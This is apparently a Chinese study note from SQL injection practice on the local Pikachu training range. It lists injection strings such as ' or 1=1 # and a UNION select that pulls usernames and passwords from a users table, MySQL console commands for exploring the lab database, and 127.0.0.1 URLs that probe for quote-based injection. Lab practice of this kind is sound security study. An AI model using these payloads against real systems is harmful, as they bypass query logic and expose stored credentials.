在Pikachu靶场里查询

xx' or 1=1 #

' or 1=1 #

' union select username,password from users#

在 MySQL 的 bin 路径下打开 cmd ，输入下面的命令，再输入 数据库的密码

mysql -u root -p

执行命令

show databases;

use pikachu

show tables;

desc member;

select id,username,email from member;

select id,email from member where username ='xx' or 1=1;

select id,username,email from member limit 2,2;

show tables;

select * from users;

select id,email from member union select username,password from users;

单引号查询

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=vince%27&submit=%E6%9F%A5%E8%AF%A2

双引号查询

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=vince%22&submit=%E6%9F%A5%E8%AF%A2